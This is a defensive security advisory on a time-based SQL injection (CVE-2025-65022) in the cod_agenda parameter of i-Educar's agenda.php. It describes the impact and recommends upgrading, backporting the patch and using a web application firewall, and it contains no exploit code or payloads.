High-Severity SQL Injection Threatens i-Educar Users (CVE-2025-65022)

Overview

A critical vulnerability, identified as CVE-2025-65022, has been discovered in i-Educar, a popular free and open-source school management software. This vulnerability is a time-based SQL injection affecting versions 2.10.0 and earlier. An attacker with valid user credentials can exploit this flaw to execute arbitrary SQL commands, potentially leading to significant data breaches or system compromise. Immediate patching is strongly recommended.

Technical Details

The vulnerability resides in the ieducar/intranet/agenda.php script. The cod_agenda request parameter is directly concatenated into multiple SQL queries without proper sanitization. This lack of input validation allows an authenticated attacker to inject malicious SQL code via the cod_agenda parameter. The time-based nature of the injection allows the attacker to infer information about the database structure and contents by observing the response times to crafted queries.

CVSS Analysis

This vulnerability has been assigned a CVSS score of 7.2 (HIGH). This score reflects the potential for significant impact and the relative ease of exploitation given authenticated access. The CVSS vector provides more detailed insights into the attack characteristics and potential consequences.

Possible Impact

Successful exploitation of this SQL injection vulnerability could have severe consequences:

• Data Breach: Sensitive student, teacher, and administrative data could be exposed.
• Data Manipulation: Attackers could modify or delete critical data, disrupting school operations.
• Account Takeover: Attackers could gain control of administrator accounts, granting them complete control over the system.
• System Compromise: In some configurations, the attacker might be able to leverage the SQL injection to gain code execution on the underlying server.

Mitigation and Patch Steps

The vulnerability has been patched in commit b473f92. To mitigate the risk, administrators are strongly advised to:

1. Upgrade i-Educar: Immediately upgrade to a version that includes the fix (later than version 2.10.0 containing the fix from the provided commit).
2. Review Code (If Necessary): If an immediate upgrade is not possible, carefully review and backport the fix from the provided commit into your existing i-Educar installation.
3. Web Application Firewall (WAF): Implement or configure a WAF to filter out malicious SQL injection attempts. However, a WAF should not be considered a replacement for patching the underlying vulnerability.

References

• CVE ID: CVE-2025-65022
• GitHub Commit (Patch): https://github.com/portabilis/i-educar/commit/b473f92b5326f45d7bce2de93a5381bed7ca8ac7
• GitHub Security Advisory: https://github.com/portabilis/i-educar/security/advisories/GHSA-4hrj-5gwx-r4w4